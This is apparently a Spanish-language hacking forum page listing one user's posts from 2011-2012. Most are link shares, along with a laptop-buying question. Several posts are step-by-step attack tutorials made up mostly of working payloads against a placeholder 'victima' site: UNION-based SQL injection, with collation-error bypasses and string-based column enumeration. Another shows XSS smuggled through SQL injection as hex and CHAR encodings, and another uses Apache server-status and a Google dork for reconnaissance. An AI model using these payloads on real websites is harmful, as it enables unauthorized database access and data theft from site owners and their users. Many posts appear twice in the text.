A mi me gustaria pero no se si llego con a los 4 meses registrado en el foro :/
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#2
Bugs y Exploits / Apache Server Status [info]
Octubre 30, 2012, 09:43:24 PMBueno les queria comentar de algo que puede venir util para hacer information gathering en un pentest (o lo que sea que hagan picarones) para servidores corriendo apache.
Apache tiene una funcion llamada server-status que nos da informacion bastante util, por ejemplo: procesos corriendo, el estado de cada peticion, IPs de personas que esten visitando el sitio, las URL de las peticiones (util para encontrar paneles de admin escondidos o con un nombre no usual), entre otras.
Para usar esto solamente hay que agregar /server-status/
EDIT: Para visualizarlo por ahi de una manera mas comoda para algunos hay que agregar ?notable
O sea que quedaria asi /server-status?notable/
Ejemplo:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Google dork: inurl:/server-status/ + intext:apache status
Espero que les guste, saludos!
#3
Tutoriales y Manuales de Malwares / Analisis de malware (Ingles)
Octubre 10, 2012, 08:31:08 PM
Este escrito trata de varios problemas de seguridad que se emplean en los RAT y de los 0day que se descubrieron. Esta en ingles, espero que les guste.
Sitio Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sitio Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
Hacking / Lock Picking PDF
Agosto 25, 2011, 01:08:50 AM
Aca les dejo un tutorial de lockpicking de Syngress. Esta buenisimo ya que viene con imagenes ilustrativas para dar una explicacion detallada. Espero que les guste!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Hacking / Unmasked PDF
Agosto 25, 2011, 12:38:16 AM
Aca les dejo el PDF que habla de Anonymous y su intrusion a HBGary y como el congreso empezo a preocuparse por ellos. Es una buena lectura y son solo 100 paginas. Espero que les guste!
Este es el link del libro: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Y aca esta el link para descargarlo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Este es el link del libro: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Y aca esta el link para descargarlo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
Bugs y Exploits / Bypassear "Illegal mix of collations"
Agosto 25, 2011, 12:16:05 AM
Bueno supongamos que tenemos una inyeccion comun y ya sacamos las columnas vulnerables, ahi es cuando tratamos de encontrar la version y hacemos
www.victima.com/index.php?id=1 UNION SELECT 1,2,version(),4,5,6,7--
o sino
www.victima.com/index.php?id=1 UNION SELECT 1,2,@@version,4,5,6,7--
Ahi aparece el error de: "SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
AUNQUE A VECES NO APARECE NADA CUANDO INTENTAMOS PONER VERSION() POR EJEMPLO ASI QUE SIGNIFICA QUE ES ESTE MISMO ERROR
Hay varias maneras de bypassear esto, algunas son:
Convert("comando" using latin1)
unhex(hex("comando"))
Ejemplos:
www.victima.com/index.php?id=1 UNION SELECT 1,2,convert(version() using latin1),4,5,6,7--
www.victima.com/index.php?id=1 UNION SELECT 1,2,unhex(hex(version())),4,5,6,7--
www.victima.com/index.php?id=1 UNION SELECT 1,2,convert(@@version using latin1)4,5,6,7--
LA INYECCION SE TIENE QUE SEGUIR HACIENDO DE ESA MANERA, POR EJEMPLO:
www.victima.com/index.php?id=1 UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 FROM usuarios--
Espero que les haya gustado!
www.victima.com/index.php?id=1 UNION SELECT 1,2,version(),4,5,6,7--
o sino
www.victima.com/index.php?id=1 UNION SELECT 1,2,@@version,4,5,6,7--
Ahi aparece el error de: "SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
AUNQUE A VECES NO APARECE NADA CUANDO INTENTAMOS PONER VERSION() POR EJEMPLO ASI QUE SIGNIFICA QUE ES ESTE MISMO ERROR
Hay varias maneras de bypassear esto, algunas son:
Convert("comando" using latin1)
unhex(hex("comando"))
Ejemplos:
www.victima.com/index.php?id=1 UNION SELECT 1,2,convert(version() using latin1),4,5,6,7--
www.victima.com/index.php?id=1 UNION SELECT 1,2,unhex(hex(version())),4,5,6,7--
www.victima.com/index.php?id=1 UNION SELECT 1,2,convert(@@version using latin1)4,5,6,7--
LA INYECCION SE TIENE QUE SEGUIR HACIENDO DE ESA MANERA, POR EJEMPLO:
www.victima.com/index.php?id=1 UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 FROM usuarios--
Espero que les haya gustado!
#7
Bugs y Exploits / XSS no persistente con SQLi
Agosto 25, 2011, 12:08:40 AM
Para hacer una inyeccion XSS no persistente a travez de una inyeccion SQL hay que hacer lo siguiente:
Encontramos un sitio vulnerable
www.victima.com/index.php?id=1'
Luego hacemos un UNION con la cantidad de columnas (Ej: 6)
www.victima.com/index.php?id=1 UNION SELECT 1,2,3,4,5,6--
Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo
El original es
<script>alert("XSS");</script>
Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL
HEX ENCODED:
0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e
MySQL CHAR:
CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)
Espero que les haya gustado!
Encontramos un sitio vulnerable
www.victima.com/index.php?id=1'
Luego hacemos un UNION con la cantidad de columnas (Ej: 6)
www.victima.com/index.php?id=1 UNION SELECT 1,2,3,4,5,6--
Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo
El original es
<script>alert("XSS");</script>
Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL
HEX ENCODED:
0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e
MySQL CHAR:
CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)
Espero que les haya gustado!
#8
Bugs y Exploits / String Based SQL injection
Agosto 25, 2011, 12:00:05 AM
Supongamos que tenemos un sitio:
www.victima.com/index.php?ID=1'
Intentamos con el comando comun de
www.victima.com/index.php?ID=1+order+by+1--
No tenemos un error
Probamos con
www.victima.com/index.php?ID=1+order+by+10000--
No tenemos un error
Hay que hacer una string based injection
www.victima.com/index.php?ID=1'+order+by+1--+-
No tenemos error
Probamos con
www.victima.com/index.php?ID=1'+order+by+10--+-
TENEMOS ERROR!!
Entonces supongamos que probamos con
www.victima.com/index.php?ID=1'+order+by+9--+-
Y ahi no tenemos error o sea que son 9 columnas!
Entonces ahi seguimos como con una inyeccion normal
www.victima.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9--+-
Bueno espero que les haya gustado!!
www.victima.com/index.php?ID=1'
Intentamos con el comando comun de
www.victima.com/index.php?ID=1+order+by+1--
No tenemos un error
Probamos con
www.victima.com/index.php?ID=1+order+by+10000--
No tenemos un error
Hay que hacer una string based injection
www.victima.com/index.php?ID=1'+order+by+1--+-
No tenemos error
Probamos con
www.victima.com/index.php?ID=1'+order+by+10--+-
TENEMOS ERROR!!
Entonces supongamos que probamos con
www.victima.com/index.php?ID=1'+order+by+9--+-
Y ahi no tenemos error o sea que son 9 columnas!
Entonces ahi seguimos como con una inyeccion normal
www.victima.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9--+-
Bueno espero que les haya gustado!!
#9
Bugs y Exploits / Paper Inyeccion SQL avanzada (DEFCON)
Agosto 24, 2011, 11:39:45 PM
Aca les dejo un paper de la DEFCON 17 en inyecciones SQL avanzadas. Espero que les guste!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
Dudas y pedidos generales / [SOLUCIONADO] Cuál es mejor computadora/ PC ?
Agosto 19, 2011, 08:32:18 PM
Hola a todos, estoy por comprarme una computadora nueva y quisiera saber cual es mejor de estas dos para gaming o para tareas que requieran intensivos recursos,etc... Gracias!!
ASUS G74SX A2
Procesador:
2.00GHz Intel Core i7-2630QM Turbo Boost 2.90GHz (6MB Cache)
Display:
17.3 LED (1920 x 1080)
Disco Rigido:
910GB (1x750GB 7200rpm; 1x160GB SSD)
Memoria:
16GB DDR3 a 1333MHZ
Placa Video:
NVIDIA GeForce GTX 560M (3GB GDDR5)
Alienware M17x
Procesador:
Intel® Core™ i7 2630QM 2.0GHz (2.9GHz Turbo Mode, 6MB Cache)
Display:
17.3-inch WideFHD 1920x1080 120Hz WLED
Disco rigido:
750GB 7,200RPM HDD
Memoria:
8GB Dual Channel DDR3 at 1333MHz (4DIMMS)
Placa Video:
1.5GB GDDR5 NVIDIA GeForce GTX 560M
Bueno espero que puedan ayudarme!! Gracias!
ASUS G74SX A2
Procesador:
2.00GHz Intel Core i7-2630QM Turbo Boost 2.90GHz (6MB Cache)
Display:
17.3 LED (1920 x 1080)
Disco Rigido:
910GB (1x750GB 7200rpm; 1x160GB SSD)
Memoria:
16GB DDR3 a 1333MHZ
Placa Video:
NVIDIA GeForce GTX 560M (3GB GDDR5)
Alienware M17x
Procesador:
Intel® Core™ i7 2630QM 2.0GHz (2.9GHz Turbo Mode, 6MB Cache)
Display:
17.3-inch WideFHD 1920x1080 120Hz WLED
Disco rigido:
750GB 7,200RPM HDD
Memoria:
8GB Dual Channel DDR3 at 1333MHz (4DIMMS)
Placa Video:
1.5GB GDDR5 NVIDIA GeForce GTX 560M
Bueno espero que puedan ayudarme!! Gracias!
#11
Seguridad Wireless / Cracking WEP de 128 bits
Mayo 07, 2011, 05:39:24 PM
Aca les dejo un videotutorial de como crackear una WEP de 128 bits con una inyeccion en Backtrack. Si tienen alguna duda no duden en preguntarme!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Páginas1